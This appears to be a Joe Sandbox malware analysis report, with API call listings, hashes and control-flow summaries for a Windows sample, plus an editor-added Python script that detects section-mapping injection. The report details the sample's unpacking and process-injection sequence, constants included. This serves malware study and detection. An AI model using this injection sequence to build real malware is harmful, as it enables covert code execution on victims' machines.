                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_520000_2Qvkmk7HGr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CreateFirstModule32SnapshotToolhelp32
                                              • String ID:
                                              • API String ID: 3833638111-0
                                              • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                              • Instruction ID: b82a74f825a896779aaf3ad3a105d1ddb4c3915e02c155b3b866728b0ce944b1
                                              • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                              • Instruction Fuzzy Hash: F6F06232540B156BD7203BB59C8DB6A7BE8BF49764F101528E642915C0DA70EC464665

                                              Control-flow Graph

                                              control_flow_graph 0 55003c-550047 1 55004c-550263 call 550a3f call 550e0f call 550d90 VirtualAlloc 0->1 2 550049 0->2 17 550265-550289 call 550a69 1->17 18 55028b-550292 1->18 2->1 23 5502ce-5503c2 VirtualProtect call 550cce call 550ce7 17->23 20 5502a1-5502b0 18->20 22 5502b2-5502cc 20->22 20->23 22->20 29 5503d1-5503e0 23->29 30 5503e2-550437 call 550ce7 29->30 31 550439-5504b8 VirtualFree 29->31 30->29 33 5505f4-5505fe 31->33 34 5504be-5504cd 31->34 35 550604-55060d 33->35 36 55077f-550789 33->36 38 5504d3-5504dd 34->38 35->36 39 550613-550637 35->39 42 5507a6-5507b0 36->42 43 55078b-5507a3 36->43 38->33 41 5504e3-550505 38->41 46 55063e-550648 39->46 50 550517-550520 41->50 51 550507-550515 41->51 44 5507b6-5507cb 42->44 45 55086e-5508be LoadLibraryA 42->45 43->42 47 5507d2-5507d5 44->47 55 5508c7-5508f9 45->55 46->36 48 55064e-55065a 46->48 52 550824-550833 47->52 53 5507d7-5507e0 47->53 48->36 54 550660-55066a 48->54 56 550526-550547 50->56 51->56 60 550839-55083c 52->60 57 5507e4-550822 53->57 58 5507e2 53->58 59 55067a-550689 54->59 61 550902-55091d 55->61 62 5508fb-550901 55->62 63 55054d-550550 56->63 57->47 58->52 64 550750-55077a 59->64 65 55068f-5506b2 59->65 60->45 66 55083e-550847 60->66 62->61 68 550556-55056b 63->68 69 5505e0-5505ef 63->69 64->46 70 5506b4-5506ed 65->70 71 5506ef-5506fc 65->71 72 550849 66->72 73 55084b-55086c 66->73 74 55056d 68->74 75 55056f-55057a 68->75 69->38 70->71 76 5506fe-550748 71->76 77 55074b 71->77 72->45 73->60 74->69 78 55057c-550599 75->78 79 55059b-5505bb 75->79 76->77 77->59 84 5505bd-5505db 78->84 79->84 84->63
                                              APIs
                                              • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0055024D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1768987003.0000000000550000.00000040.00001000.00020000.00000000.sdmp, Offset: 00550000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_550000_2Qvkmk7HGr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID: cess$kernel32.dll
                                              • API String ID: 4275171209-1230238691
                                              • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                              • Instruction ID: 45bb27c3125b16f6db0b06f06b814a4eb305919380205288ee8db3488fa42a7c
                                              • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                              • Instruction Fuzzy Hash: 39526C74A00229DFDB64CF58C995BA8BBB1BF09305F1480DAE94DA7351DB30AE89DF14

                                              Control-flow Graph

                                              control_flow_graph 241 550e0f-550e24 SetErrorMode * 2 242 550e26 241->242 243 550e2b-550e2c 241->243 242->243
                                              APIs
                                              • SetErrorMode.KERNELBASE(00000400,?,?,00550223,?,?), ref: 00550E19
                                              • SetErrorMode.KERNELBASE(00000000,?,?,00550223,?,?), ref: 00550E1E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1768987003.0000000000550000.00000040.00001000.00020000.00000000.sdmp, Offset: 00550000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_550000_2Qvkmk7HGr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ErrorMode
                                              • String ID:
                                              • API String ID: 2340568224-0
                                              • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                              • Instruction ID: 59f4f3660f24c022e483895a9ce12252ed7c3a0652483bba4d3b890b59234470
                                              • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                              • Instruction Fuzzy Hash: 8AD0123114512877D7002AD4DC09BCD7F1CDF05B63F108411FB0DD9080C770994046E5

                                              Control-flow Graph

                                              control_flow_graph 244 401919-40191a 245 401969-4019c5 call 401207 Sleep call 401482 244->245 246 40191d-401956 call 401207 244->246 267 4019d4-401a19 245->267 268 4019c7-4019cf call 401583 245->268 278 401a1c-401a25 call 401207 267->278 279 401a0f-401a15 267->279 268->267 279->278
                                              APIs
                                              • Sleep.KERNELBASE(00001388,000000FA), ref: 004019B0
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1768696668.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_2Qvkmk7HGr.jbxd
                                              Similarity
                                              • API ID: Sleep
                                              • String ID:
                                              • API String ID: 3472027048-0
                                              • Opcode ID: 2b935ac753e934015516d799e1095bac90694ea099bafde975148c207ca850c9
                                              • Instruction ID: 49835af623e861a6f2ddbc0bf662c5c40176c384461ea98b099af7f339eb22c4
                                              • Opcode Fuzzy Hash: 2b935ac753e934015516d799e1095bac90694ea099bafde975148c207ca850c9
                                              • Instruction Fuzzy Hash: 7911DCB234C201EBD6009A84A862E7A3214AB51359F304537FA57B90F2D57D9A13F76F

                                              Control-flow Graph

                                              control_flow_graph 282 401959-4019c5 call 401207 Sleep call 401482 296 4019d4-401a19 282->296 297 4019c7-4019cf call 401583 282->297 307 401a1c-401a25 call 401207 296->307 308 401a0f-401a15 296->308 297->296 308->307
                                              APIs
                                              • Sleep.KERNELBASE(00001388,000000FA), ref: 004019B0
                                                • Part of subcall function 00401583: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401643
                                                • Part of subcall function 00401583: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401670
                                                • Part of subcall function 00401583: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401693
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1768696668.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_2Qvkmk7HGr.jbxd
                                              Similarity
                                              • API ID: Section$CreateDuplicateObjectSleepView
                                              • String ID:
                                              • API String ID: 1885482327-0
                                              • Opcode ID: 973fe8c7f692c8164376a233d22da1c8e21a759768f578ec8ae17a8f290018c7
                                              • Instruction ID: 220a72f44c34cad911d214d6bf830d158092726683e2111099ccb198781fee4b
                                              • Opcode Fuzzy Hash: 973fe8c7f692c8164376a233d22da1c8e21a759768f578ec8ae17a8f290018c7
                                              • Instruction Fuzzy Hash: 1311BCB1648204FADA009A849C62E7A3228AB41754F204137BA47B90F1C57DA913EAAF

                                              Control-flow Graph

                                              control_flow_graph 311 401970-4019c5 call 401207 Sleep call 401482 323 4019d4-401a19 311->323 324 4019c7-4019cf call 401583 311->324 334 401a1c-401a25 call 401207 323->334 335 401a0f-401a15 323->335 324->323 335->334
                                              APIs
                                              • Sleep.KERNELBASE(00001388,000000FA), ref: 004019B0
                                                • Part of subcall function 00401583: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401643
                                                • Part of subcall function 00401583: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401670
                                                • Part of subcall function 00401583: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401693
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1768696668.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_2Qvkmk7HGr.jbxd
                                              Similarity
                                              • API ID: Section$CreateDuplicateObjectSleepView
                                              • String ID:
                                              • API String ID: 1885482327-0
                                              • Opcode ID: b0ddfabd172ae9c3cb26196b0cb86bb5accc73c170931bda3ffef6ca5bc85053
                                              • Instruction ID: edf3ac2f4a0a3dadc82130375ffc9a201d65d5ca35b25829e414e95522c05f9b
                                              • Opcode Fuzzy Hash: b0ddfabd172ae9c3cb26196b0cb86bb5accc73c170931bda3ffef6ca5bc85053
                                              • Instruction Fuzzy Hash: AA01C0B174C104EBDB009A84DC62E7A3214AF41704F204537BA57B91F1C53EAA23FB5B

                                              Control-flow Graph

                                              control_flow_graph 338 401977-4019c5 call 401207 Sleep call 401482 347 4019d4-401a19 338->347 348 4019c7-4019cf call 401583 338->348 358 401a1c-401a25 call 401207 347->358 359 401a0f-401a15 347->359 348->347 359->358
                                              APIs
                                              • Sleep.KERNELBASE(00001388,000000FA), ref: 004019B0
                                                • Part of subcall function 00401583: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401643
                                                • Part of subcall function 00401583: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401670
                                                • Part of subcall function 00401583: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401693
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1768696668.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_2Qvkmk7HGr.jbxd
                                              Similarity
                                              • API ID: Section$CreateDuplicateObjectSleepView
                                              • String ID:
                                              • API String ID: 1885482327-0
                                              • Opcode ID: 547ce1ee7459762dd25db0cd36bc5e4baa4f04934683c573935985333de64e11
                                              • Instruction ID: c889a794982209429869940d23560ef391d683eb1520a1ae8baa03dfc3eb9000
                                              • Opcode Fuzzy Hash: 547ce1ee7459762dd25db0cd36bc5e4baa4f04934683c573935985333de64e11
                                              • Instruction Fuzzy Hash: E601E1B1308100EBD7009B849C51ABA3614AF41314F20413BB957790E2C53EAA22EB5B

                                              Control-flow Graph

                                              control_flow_graph 362 401987-4019c5 call 401207 Sleep call 401482 373 4019d4-401a19 362->373 374 4019c7-4019cf call 401583 362->374 384 401a1c-401a25 call 401207 373->384 385 401a0f-401a15 373->385 374->373 385->384
                                              APIs
                                              • Sleep.KERNELBASE(00001388,000000FA), ref: 004019B0
                                                • Part of subcall function 00401583: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401643
                                                • Part of subcall function 00401583: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401670
                                                • Part of subcall function 00401583: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401693
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1768696668.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_2Qvkmk7HGr.jbxd
                                              Similarity
                                              • API ID: Section$CreateDuplicateObjectSleepView
                                              • String ID:
                                              • API String ID: 1885482327-0
                                              • Opcode ID: 48afa338b6eb4ead81a9d6383d5bdcf6d33ddda25fb9a1f4e9ca7df9d9b0c8b0
                                              • Instruction ID: 1aa0efa7bda459d32f82bf33ce90feabc7a2b43109eca8adeaaf204144b81d62
                                              • Opcode Fuzzy Hash: 48afa338b6eb4ead81a9d6383d5bdcf6d33ddda25fb9a1f4e9ca7df9d9b0c8b0
                                              • Instruction Fuzzy Hash: C201C0B1708104EBDB009A84DC62E7A3214AF41714F204137BA57791F1C53EAA23FB5B

                                              Control-flow Graph

                                              control_flow_graph 388 40198a-40199d 389 4019a8-4019c5 Sleep call 401482 388->389 390 4019a2 call 401207 388->390 393 4019d4-401a19 389->393 394 4019c7-4019cf call 401583 389->394 390->389 404 401a1c-401a25 call 401207 393->404 405 401a0f-401a15 393->405 394->393 405->404
                                              APIs
                                              • Sleep.KERNELBASE(00001388,000000FA), ref: 004019B0
                                                • Part of subcall function 00401583: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401643
                                                • Part of subcall function 00401583: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401670
                                                • Part of subcall function 00401583: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401693
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1768696668.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_2Qvkmk7HGr.jbxd
                                              Similarity
                                              • API ID: Section$CreateDuplicateObjectSleepView
                                              • String ID:
                                              • API String ID: 1885482327-0
                                              • Opcode ID: 66f4d7de36bf33a8276767325b567db769fa807301e16b4e03cd2b1c881b4aa0
                                              • Instruction ID: 93e9f4b763319a312fe66b3304ba82e0c9e14e36225fd67d869cb8e68c59c211
                                              • Opcode Fuzzy Hash: 66f4d7de36bf33a8276767325b567db769fa807301e16b4e03cd2b1c881b4aa0
                                              • Instruction Fuzzy Hash: 5501B572308244EBDB019F90DC92EAE3728AF45318F24017BB557790E2C53DA912EB1B

                                               Control-flow Graph (function at 531946; graph rendered as text, summarised)
                                               • Basic blocks: 531946-531980 (call 531c59); 531982-5319b5 (VirtualAlloc, call 5319d3); 5319ba-5319cc; 5319ce (branches to itself)
                                               • Both paths end in the self-looping block at 5319ce
                                              APIs
                                              • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 00531997
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1768955297.0000000000520000.00000040.00001000.00020000.00000000.sdmp, Offset: 00520000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_520000_2Qvkmk7HGr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID:
                                              • API String ID: 4275171209-0
                                              • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                              • Instruction ID: d3b36b3d9baeb5794ffd6da86aef9884ceafb4e2bf236d1f2d357f08bb52a105
                                              • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                              • Instruction Fuzzy Hash: 89113C79A00208EFDB01DF98C989E99BFF5AF08351F0580A5F9489B362D371EA50DF84
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1768987003.0000000000550000.00000040.00001000.00020000.00000000.sdmp, Offset: 00550000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_550000_2Qvkmk7HGr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: .$GetProcAddress.$l
                                              • API String ID: 0-2784972518
                                              • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                              • Instruction ID: a0d7601ad3be0be9ca7345b1b9b156f71840a4e34a964fc1e8f9d03f8084ce82
                                              • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                              • Instruction Fuzzy Hash: 483179B6900609CFDB10CF99C880AAEBBF9FF48325F24504AD841A7351D771EA49CBA4
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1768696668.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_2Qvkmk7HGr.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: #X%
                                              • API String ID: 0-730838689
                                              • Opcode ID: 245b7a6330694b5c367d3b257ccbe4366a0bf95add0a101e660e11a0368d02b9
                                              • Instruction ID: 71e09992ebba1ebce1a14e5228dc5e73fa07ad40964d1ad344f7d49068a62d69
                                              • Opcode Fuzzy Hash: 245b7a6330694b5c367d3b257ccbe4366a0bf95add0a101e660e11a0368d02b9
                                              • Instruction Fuzzy Hash: 2441DC352485539DC30299188E899EABF79FDC7398B10017ED8C2AB9D3CBA02517D3B6
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1768696668.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_2Qvkmk7HGr.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 24dfe36045d0991ac749a0892ad312c9a4e30bcc45954bcab72f1b8cf2b0dd63
                                              • Instruction ID: 18334b27c1f95b13a70b5794667acb6e5ebe9408c321dbf9d60f89b0be35e569
                                              • Opcode Fuzzy Hash: 24dfe36045d0991ac749a0892ad312c9a4e30bcc45954bcab72f1b8cf2b0dd63
                                              • Instruction Fuzzy Hash: AA51AE612492109FE71989358C829B637219F43726F2C327FE98267EE6D379D4438A4A
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1768955297.0000000000520000.00000040.00001000.00020000.00000000.sdmp, Offset: 00520000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_520000_2Qvkmk7HGr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                              • Instruction ID: 26bc10cb75916793da9d8b96670eda41be48f5ec240f76cdadba6e69c5e4a327
                                              • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                              • Instruction Fuzzy Hash: 8511AC72340500AFD750CF69DCC1FA277EAFB88320B298065ED06CB316E675E802CB64
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1768987003.0000000000550000.00000040.00001000.00020000.00000000.sdmp, Offset: 00550000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_550000_2Qvkmk7HGr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                              • Instruction ID: 714e70d2f4900003e1559038d9d578e80d48b8cbfd1985c0913e936ce88b802b
                                              • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                              • Instruction Fuzzy Hash: E801DF72A006008FDB21DF60C825BAA37B9FB86306F1544A6D90A97282E370A8498B80

                                              Execution Graph

                                              Execution Coverage:8.7%
                                              Dynamic/Decrypted Code Coverage:100%
                                              Signature Coverage:0%
                                              Total number of Nodes:107
                                              Total number of Limit Nodes:3
                                               execution_graph (node and edge dump rendered as text; the call chains it encodes):
                                               • 6214e7 -> 6214f6 -> 621c87 (CreateToolhelp32Snapshot, Module32First) -> 621946 -> 621982 (VirtualAlloc) -> 6219ba (loops on itself)
                                               • 560001 -> 560005 -> 56092b (GetPEB) -> 560030 -> 56003c -> 560e0f (SetErrorMode, SetErrorMode) -> 560223 -> 560d90 -> 560dbb (GetPEB) -> 560238 (VirtualAlloc) -> 560265 -> 5602ce (VirtualProtect) -> 56030b -> 560439 (VirtualFree) -> 5604be (LoadLibraryA) -> 5608c7
                                               • 40198a, 401970, 401919 and 401959 (the latter reached from 402e50 and 402f17, 8 API calls) -> 4019a8 (Sleep) -> 4019c3 -> 401583 (7 API calls) -> 4019d4
                                               • 40158e -> 4015bf -> 401634 (NtDuplicateObject) -> 401651 (NtCreateSection) -> 401677 (NtMapViewOfSection) -> 40169a (NtMapViewOfSection) -> 4016d1 (NtCreateSection) -> 4016fd -> 401707 (NtMapViewOfSection) -> 40172e (NtMapViewOfSection) -> 401750; every failed step exits to 401750
                                               • 403054 -> 40307e -> 403139 (RtlCreateUserThread, NtTerminateProcess) -> 403197

                                               Control-flow Graph (function at 401583; graph rendered as text, summarised)
                                               • Basic blocks: 401583-4015de (call 401207); 4015e0; 4015e3-4015e8; 4015ee-4015ff; 401605-40162e; 401634-40164b (NtDuplicateObject); 401651-401675 (NtCreateSection); 401677-401698 (NtMapViewOfSection); 40169a-4016b6 (NtMapViewOfSection); 4016b8-4016ce; 4016d1-4016f7 (NtCreateSection); 4016fd-401701; 401707-401728 (NtMapViewOfSection); 40172e-40174a (NtMapViewOfSection); 401750 (call 401755); 401907; 401909-401911; 401916-401956 (call 401207)
                                               • Each NT call block branches to 401907 on failure; 4015e3-4015e8 and 401909-401911 form the loop that wraps the body
                                              APIs
                                              • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401643
                                              • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401670
                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401693
                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016B1
                                              • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016F2
                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401723
                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401745
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2003769507.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_400000_tcgiwaf.jbxd
                                              Similarity
                                              • API ID: Section$View$Create$DuplicateObject
                                              • String ID:
                                              • API String ID: 1546783058-0
                                              • Opcode ID: d8025aa2a73fa1757bf9d96cb7b1acd78e4ac8c64498884b03c6ab91ddf532bc
                                              • Instruction ID: f2d5e20ae79a609852431105b0704d648b73f45673a5aa535929140ce5e9a1ec
                                              • Opcode Fuzzy Hash: d8025aa2a73fa1757bf9d96cb7b1acd78e4ac8c64498884b03c6ab91ddf532bc
                                              • Instruction Fuzzy Hash: 42614DB0900209FFEB218F91CC48FAF7BB8EF85710F10012AF952BA1E5D6749941DB25
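                                               The seven NT calls listed for this routine are the section-mapping injection sequence: a handle is duplicated with DUPLICATE_SAME_ACCESS (0x2), a pagefile-backed section (SEC_COMMIT, 0x08000000) is created first PAGE_READWRITE (0x4) and then PAGE_EXECUTE_READWRITE (0x40), and each section is mapped twice with InheritDisposition ViewShare (0x1), once under the handle shown as 000000FF with PAGE_READWRITE and once under a handle the sandbox could not resolve ("?"), the last time PAGE_EXECUTE_READ (0x20). The writable view is where the payload is written; the executable view in the other process is where it runs. The script below is an added, editor-written example, not Joe Sandbox code and not code from the sample: it parses API lines in the report's "Name.Module(args), ref: addr" format, decodes the constants above, and flags the write-then-execute split. SAMPLE_TRACE is copied verbatim from the listing; the constant tables, the treatment of extra stack values past the real argument count (the 000000FA after Sleep's single argument, the trailing "?" after NtMapViewOfSection's ten), and the heuristic are the example's own assumptions.

```python
"""Decode the 'APIs' lines of this Joe Sandbox report and flag the
section-mapping injection sequence they describe.

Added, editor-written example: not Joe Sandbox code and not code from the
analysed sample. SAMPLE_TRACE is copied from the report's listing for the
routine at 401583; the constant tables and the heuristic are the editor's.
"""
import re
from dataclasses import dataclass

# Constructed input: the seven API lines the report lists for sub_401583.
SAMPLE_TRACE = """\
NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401643
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401670
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401693
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016B1
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016F2
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401723
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401745
"""

LINE_RE = re.compile(
    r"^(?P<name>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$"
)

# Win32 / NT constants (winnt.h, ntifs.h) needed to read the arguments.
PAGE_PROT = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
             0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}
EXEC_MASK = 0xF0                 # PAGE_EXECUTE, _READ, _READWRITE, _WRITECOPY
SEC_COMMIT = 0x08000000
MEM_COMMIT = 0x1000
DUPLICATE_SAME_ACCESS = 0x2


@dataclass
class ApiCall:
    name: str
    module: str
    args: list   # one int per argument, None where the report prints '?'
    ref: int     # return address printed after 'ref:'


def parse_line(line):
    """Parse one 'Name.Module(args), ref: addr' line; None if it is not one."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    args = [None if t.strip() == "?" else int(t, 16)
            for t in m.group("args").split(",")]
    return ApiCall(m.group("name"), m.group("module"), args,
                   int(m.group("ref"), 16))


def parse_trace(text):
    return [c for c in map(parse_line, text.splitlines()) if c]


def decode(call):
    """Name the arguments that matter for the APIs this report lists.
    Extra stack values Joe prints past the real argument count are ignored."""
    a = call.args
    if call.name == "NtCreateSection":        # (h, access, oa, size, prot, alloc, file)
        return {"page_protection": PAGE_PROT.get(a[4], a[4]),
                "sec_commit": a[5] == SEC_COMMIT,
                "pagefile_backed": a[6] == 0}
    if call.name == "NtMapViewOfSection":     # 10 args; a[1] process, a[9] protect
        return {"process_handle": a[1], "win32_protect": PAGE_PROT.get(a[9], a[9])}
    if call.name == "VirtualAlloc":           # (addr, size, type, protect)
        return {"commit": a[2] is not None and bool(a[2] & MEM_COMMIT),
                "protect": PAGE_PROT.get(a[3], a[3])}
    if call.name == "Sleep":                  # one real argument
        return {"milliseconds": a[0]}
    if call.name == "NtDuplicateObject":      # a[6] is Options
        return {"same_access": a[6] == DUPLICATE_SAME_ACCESS}
    return {}


def find_section_injection(calls):
    """Flag the write-then-execute split: a SEC_COMMIT section created with an
    executable page protection, a view mapped PAGE_READWRITE, then a later
    view mapped executable under a different process handle.
    An unresolved ('?') handle is reported as such, never assumed remote."""
    result = {"executable_section": False, "rw_then_rx_split": False,
              "unresolved_target_handle": False, "evidence": []}
    writable_view = None
    for c in calls:
        d = decode(c)
        if c.name == "NtCreateSection":
            prot = c.args[4]
            if prot is not None and prot & EXEC_MASK and d["sec_commit"]:
                result["executable_section"] = True
                result["evidence"].append(
                    f"{c.ref:08X} NtCreateSection {d['page_protection']} SEC_COMMIT")
        elif c.name == "NtMapViewOfSection":
            prot = c.args[9]
            if prot == 0x04:
                writable_view = c
            elif (prot is not None and prot & EXEC_MASK and writable_view is not None
                  and c.args[1] != writable_view.args[1]):
                result["rw_then_rx_split"] = True
                result["unresolved_target_handle"] = c.args[1] is None
                result["evidence"].append(
                    f"{writable_view.ref:08X} view PAGE_READWRITE -> "
                    f"{c.ref:08X} view {d['win32_protect']}")
    return result


if __name__ == "__main__":
    for call in parse_trace(SAMPLE_TRACE):
        print(f"{call.ref:08X} {call.name:<20} {decode(call)}")
    print(find_section_injection(parse_trace(SAMPLE_TRACE)))
```

                                               Run against the listing, the detector reports the executable section created at 004016F2 and the PAGE_READWRITE view at 00401723 followed by the PAGE_EXECUTE_READ view at 00401745 under a different, unresolved handle. The same parser reads the VirtualAlloc(…, MEM_COMMIT, PAGE_EXECUTE_READWRITE) and Sleep(0x1388 = 5000 ms) lines elsewhere in this report, so it can be pointed at any of the APIs blocks above without changes.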

                                               Control-flow Graph (function at 40158e; graph rendered as text, summarised)
                                               • Entry blocks: 40158e-4015b6; 4015c8; 4015bf-4015de (call 401207)
                                               • From 4015e0 onward the blocks are the same as in the 401583 graph above (NtDuplicateObject at 401634, NtCreateSection at 401651 and 4016d1, NtMapViewOfSection at 401677, 40169a, 401707 and 40172e, failure exit at 401907, call 401755 at 401750)
                                              APIs
                                              • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401643
                                              • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401670
                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401693
                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016B1
